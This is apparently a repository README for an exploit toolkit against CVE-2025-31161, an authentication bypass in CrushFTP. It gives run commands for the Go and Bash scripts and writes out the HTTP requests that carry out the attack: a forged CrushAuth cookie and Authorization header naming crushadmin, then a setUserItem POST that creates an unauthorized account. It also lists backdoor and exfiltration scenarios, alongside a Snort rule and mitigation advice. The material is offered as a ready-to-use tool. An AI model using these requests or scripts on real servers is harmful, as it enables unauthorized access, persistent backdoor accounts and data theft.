来源

关联漏洞

介绍

# CrushFTP Authentication Bypass - CVE-2025-31161

[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![CVE](https://img.shields.io/badge/CVE-2025--31161-red.svg)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31161)
[![Go](https://img.shields.io/badge/Go-1.20+-blue.svg)](https://golang.org/)
[![Bash](https://img.shields.io/badge/Bash-4.0+-green.svg)](https://www.gnu.org/software/bash/)

A comprehensive toolkit for exploiting CVE-2025-31161, an authentication bypass vulnerability in CrushFTP that allows unauthorized user account creation.

## 🔍 What is CVE-2025-31161?

CVE-2025-31161 is a critical authentication bypass vulnerability in CrushFTP that allows attackers to create unauthorized user accounts without proper authentication. This vulnerability exists in the web interface's user management functionality.

### Technical Details
- **CVSS Score**: TBD
- **Affected Software**: CrushFTP Web Interface
- **Attack Vector**: Network
- **Authentication Required**: None
- **Impact**: Complete system compromise through unauthorized account creation

## 🚀 Features

- **Multi-Language Support**: Go and Bash implementations
- **Smart Vulnerability Detection**: Automatically checks if target is vulnerable before exploitation
- **Interactive Mode**: Prompts for credentials only when target is confirmed vulnerable
- **Custom Port Support**: Configurable port for different deployment scenarios
- **Educational Focus**: Designed for CTF challenges and security research

## 📁 Repository Structure

```
CrushFTP-auth-bypass-CVE-2025-31161/
├── README.md                 # This documentation
├── cve-2025-31161.go        # Go implementation (recommended)
├── cve-2025-31161.sh        # Bash implementation
└── LICENSE                  # MIT License
```

## 🛠️ Installation & Requirements

### Prerequisites

#### For Go Version (Recommended)
```bash
# Install Go (if not already installed)
sudo apt install golang-go
# or
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
```

#### For Bash Version
```bash
# Requires curl (usually pre-installed)
sudo apt install curl
```


### Quick Setup
```bash
git clone <repository-url>
cd CrushFTP-auth-bypass-CVE-2025-31161
chmod +x cve-2025-31161.sh
```

## 🎯 Usage

### Go Version (Recommended)
```bash
# Basic usage (default port 80)
go run cve-2025-31161.go --target_host example.com

# Custom port
go run cve-2025-31161.go --target_host example.com --port 8080

# Custom target user (default: crushadmin)
go run cve-2025-31161.go --target_host example.com --target_user admin
```

### Bash Version
```bash
# Basic usage
./cve-2025-31161.sh --target_host example.com

# Custom port
./cve-2025-31161.sh --target_host example.com --port 8080

# View help
./cve-2025-31161.sh --help
```


## 🔄 How It Works

```mermaid
flowchart TD
    A[Start Exploit] --> B[Check Target Connectivity]
    B --> C{Target Reachable?}
    C -->|No| D[Exit: Connection Failed]
    C -->|Yes| E[Send getUserList Request]
    E --> F{Response Contains OK?}
    F -->|No| G[Exit: Not Vulnerable]
    F -->|Yes| H[Target is Vulnerable!]
    H --> I[Prompt for Username]
    I --> J[Prompt for Password]
    J --> K[Send Warm-up Request]
    K --> L[Craft User Creation Payload]
    L --> M[Send setUserItem Request]
    M --> N{User Created Successfully?}
    N -->|Yes| O[Success: Account Created]
    N -->|No| P[Failed: Exploitation Failed]

    style A fill:#e1f5fe
    style H fill:#c8e6c9
    style O fill:#4caf50
    style D fill:#ffcdd2
    style G fill:#ffcdd2
    style P fill:#ffcdd2
```

## 🧪 Exploit Flow Explained

### Step 1: Vulnerability Detection
The script first sends a `getUserList` request to check if the target is vulnerable:
```http
GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV
Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
```

### Step 2: User Account Creation
If vulnerable, the script sends a `setUserItem` request with malicious XML payload:
```http
POST /webinterface/function/
Content-Type: application/x-www-form-urlencoded

command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If
```

### Step 3: Verification
The script checks for `<response_status>OK</response_status>` in the response to confirm successful user creation.

---
## ⚠️ Vulnerability Details

### Root Cause
The vulnerability stems from insufficient authentication checks in the CrushFTP web interface's user management functionality. The application accepts user creation requests without properly validating the caller's permissions.

### Impact Assessment
- **Confidentiality**: HIGH - Unauthorized access to file system
- **Integrity**: HIGH - Ability to modify/upload files
- **Availability**: MEDIUM - Potential for resource exhaustion

### Attack Scenarios
1. **Initial Access**: Create backdoor accounts for persistent access
2. **Privilege Escalation**: Create admin-level accounts
3. **Data Exfiltration**: Access sensitive files through FTP interface
4. **Lateral Movement**: Use compromised FTP server as pivot point

---
## 🛡️ Detection & Mitigation

### Detection Methods
- Monitor for unusual `setUserItem` requests in web logs
- Check for new user accounts created outside normal processes
- Implement anomaly detection for authentication bypass patterns

### Mitigation Strategies
1. **Immediate**: Block access to `/webinterface/function/` endpoints
2. **Short-term**: Update to patched CrushFTP version
3. **Long-term**: Implement proper authentication controls

### Network Signatures
```bash
# Snort/Suricata Rule Example
alert http any any -> any any (msg:"CrushFTP CVE-2025-31161 Exploit Attempt"; flow:established,to_server; content:"setUserItem"; http_uri; content:"serverGroup=MainUsers"; http_client_body; sid:1000001; rev:1;)
```
---
## 🎓 Educational Use Cases

### CTF Scenarios
- **Web Application Security**: Understanding authentication bypass vulnerabilities
- **Penetration Testing**: Demonstrating real-world exploitation techniques
- **Red Team Exercises**: Simulating APT-style attacks

### Learning Objectives
- Understanding HTTP request manipulation
- XML injection techniques
- Authentication bypass methodologies
- Multi-language exploit development

## 🚨 Legal Disclaimer

⚠️ **IMPORTANT**: This tool is designed for:
- Educational purposes
- Authorized penetration testing
- CTF competitions
- Security research in controlled environments

**DO NOT USE** on systems without explicit written permission. Unauthorized access to computer systems is illegal and may result in severe legal consequences.

## 🤝 Contributing

Contributions are welcome! Please:

1. Fork the repository
2. Create a feature branch (`git checkout -b feature/improvement`)
3. Commit your changes (`git commit -am 'Add new feature'`)
4. Push to the branch (`git push origin feature/improvement`)
5. Create a Pull Request

### Development Guidelines
- Follow existing code style
- Add comprehensive comments
- Test on multiple target environments
- Update documentation for new features

## 📝 Version History

| Version | Date | Changes |
|---------|------|---------|
| 1.0.0 | 2025-01-XX | Initial release with Go and Bash implementations |
| 1.1.0 | 2025-01-XX | Interactive mode and vulnerability detection |

## 📚 References

- [CVE-2025-31161 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31161)
- [CrushFTP Official Website](https://www.crushftp.com/)
- [OWASP Authentication Bypass](https://owasp.org/www-community/attacks/Authentication_bypass)
- [Original Research by Immersive Labs](https://github.com/Immersive-Labs-Sec/CVE-2025-31161)

---
## 📧 Contact

For questions, suggestions, or security concerns, please open an issue in this repository.

文件快照

 [4.0K]  /data/pocs/12e70c57808d0606fa170381ddbc49bc3de74ba9
├── [4.8K]  cve-2025-31161.go
├── [5.5K]  cve-2025-31161.sh
└── [7.9K]  README.md

0 directories, 3 files

备注